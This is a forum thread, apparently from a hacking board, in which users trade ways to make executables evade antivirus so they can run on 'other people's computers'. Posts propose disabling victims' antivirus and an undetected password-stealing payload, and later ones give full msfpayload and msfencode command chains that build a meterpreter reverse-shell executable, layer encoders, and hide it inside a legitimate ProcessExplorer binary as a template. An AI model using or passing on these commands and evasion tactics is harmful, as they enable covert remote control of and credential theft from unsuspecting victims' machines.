overwraith Posted December 9, 2012 Share Posted December 9, 2012 I was thinking it would be really awesome if we could reuse some of the executables from the USB Hacksaw, and Switchblade. Does anyone know of any good (but free) program execuable obfuscation software? Quote Link to comment Share on other sites More sharing options...
Goddish Posted December 10, 2012 Share Posted December 10, 2012 Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 10, 2012 Author Share Posted December 10, 2012 (edited) Some of the problems with some of the tools though was that they were always picked up by antivirus. What I am asking is if there is a program that transforms the executables making them hard for the antivirus to discover.Obfuscation uses different tactics to make code hard to reverse engineer, and by extension hard to match to heuristics, and virus databases. Edited December 10, 2012 by overwraith Quote Link to comment Share on other sites More sharing options...
Goddish Posted December 10, 2012 Share Posted December 10, 2012 (edited) You could disable or uninstall their AV with the duck(maybe stop the services?). i don't know a whole lot about this but you could pack the files too. http://www.ehow.com/...es-windows.html http://wiki.answers.com/Q/How_to_shut_down_avg_antivirus It kinda really depends on which antivirus you wanna workaround Edited December 10, 2012 by Goddish Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 10, 2012 Author Share Posted December 10, 2012 yeah, but the point is to make code that can be executed on other peoples computers, you know "hacking". Quote Link to comment Share on other sites More sharing options...
Goddish Posted December 10, 2012 Share Posted December 10, 2012 yeah, but the point is to make code that can be executed on other peoples computers, you know "hacking". If you know of a method of grabbing passwords in C# or vb.net that doesn't set off AVs PM me and we'll get to work Quote Link to comment Share on other sites More sharing options...
Goddish Posted December 10, 2012 Share Posted December 10, 2012 (edited) I think i may have found a way to make it undetected. I'll be working on a release for tomorrow evening, a password payload that isn't detected and doesn't use nirsoft... Edited December 10, 2012 by Goddish Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 10, 2012 Author Share Posted December 10, 2012 But do you know what obfuscation is in relation to EXEs? It actually takes advantage of things like fake conditional branches to confuse reverse engineers, and change the appearance of the executable to the antivirus programs. Quote Link to comment Share on other sites More sharing options...
bingowings85 Posted December 10, 2012 Share Posted December 10, 2012 add an exception in the AV software to ignore that file/folder. Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 14, 2012 Author Share Posted December 14, 2012 Everybody! The point in this is not to make an exception in the antivirus program, the point is to run the executables through a program that skews the code in such a way that it makes the code hard to recognize by antivirus. I was simply asking if anyone knew of any programs that do this. I know they exist. Virus writers use setups that can create thousands of different compilations of their code, all slightly different. Quote Link to comment Share on other sites More sharing options...
Goddish Posted December 14, 2012 Share Posted December 14, 2012 They are called crypters and there are thousands of them, all the good ones cost money, they get patched daily by AVs and you have to pay for an updating subscription to a good not well know crypter. If you know someone who has one you can give them your stub and get them to crypt it for you. Unless you know how to write a program to pack files yourself that's your best option. Quote Link to comment Share on other sites More sharing options...
Sud0x3 Posted December 14, 2012 Share Posted December 14, 2012 (edited) You will find that questions along these lines do not get answered, reason being that there are many ways to do this and it is relatively easy when you know what your doing. Il give you a hint, metasploit is capable of doing what your asking. Edited December 14, 2012 by Sud0x3 Quote Link to comment Share on other sites More sharing options...
overwraith Posted December 14, 2012 Author Share Posted December 14, 2012 Ok, thanks I will get a metasploit book. Quote Link to comment Share on other sites More sharing options...
Sud0x3 Posted December 14, 2012 Share Posted December 14, 2012 Ok, thanks I will get a metasploit book. Heres some reading material to get you started :) http://schierlm.users.sourceforge.net/avevasion.html http://adaywithtape.blogspot.nl/2010/05/creating-backdoored-exe-with-metasploit.html Quote Link to comment Share on other sites More sharing options...
CaptainHooligan Posted December 14, 2012 Share Posted December 14, 2012 Why not just use msfencode? Quote Link to comment Share on other sites More sharing options...
no42 Posted December 15, 2012 Share Posted December 15, 2012 msfencode is slightly outdated, msfvenom is newer (and combines msfpayload and msfencode) But typically, decent AV's detect all metasploit code Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 15, 2012 Share Posted December 15, 2012 AVs do not detect metasploit code. If you're making binaries, they detect the stagers (the exes that carry the initial code) Try for yourself, lower your AV, run a meterpreter binary, make sure the shell is open, then restart your AV. What do you see? The binary gets quarantined, but the meterpreter code itself runs in memory and isn't detected. Using a custom EXE template is usually your best bet, or even better, a custom EXE with a lesser used payload (windows_add_user) or learn shellcode and write your own. Quote Link to comment Share on other sites More sharing options...
CaptainHooligan Posted December 16, 2012 Share Posted December 16, 2012 I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe[/CODE]That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:[CODE]wget http://download.sysinternals.com/Files/ProcessExplorer.zipunzip ProcessExplorer.zipmsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5[/CODE]As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 17, 2012 Share Posted December 17, 2012 What CaptainHooligan says above is right, most AVs get thrown by a custom template. Some of the tougher ones (like Avast or AVG) still can pick them up. Quote Link to comment Share on other sites More sharing options...
--nick-- Posted December 28, 2012 Share Posted December 28, 2012 is there a link to a guide on making a custom .exe? id like to take a look. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted December 29, 2012 Share Posted December 29, 2012 The idea isn't to make a custom EXE, but to USE one. If you want to MAKE a custom EXE, fire up Notepad++ and your favourite compiler and get coding. If you want to USE a custom EXE (ie not the default one bundled with metasploit), then you can use the '-x' option with 'msfvenom'.. There are other ways, but I find that to be the easiest. Just remember to spawn a listener in metasploit if you need one! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.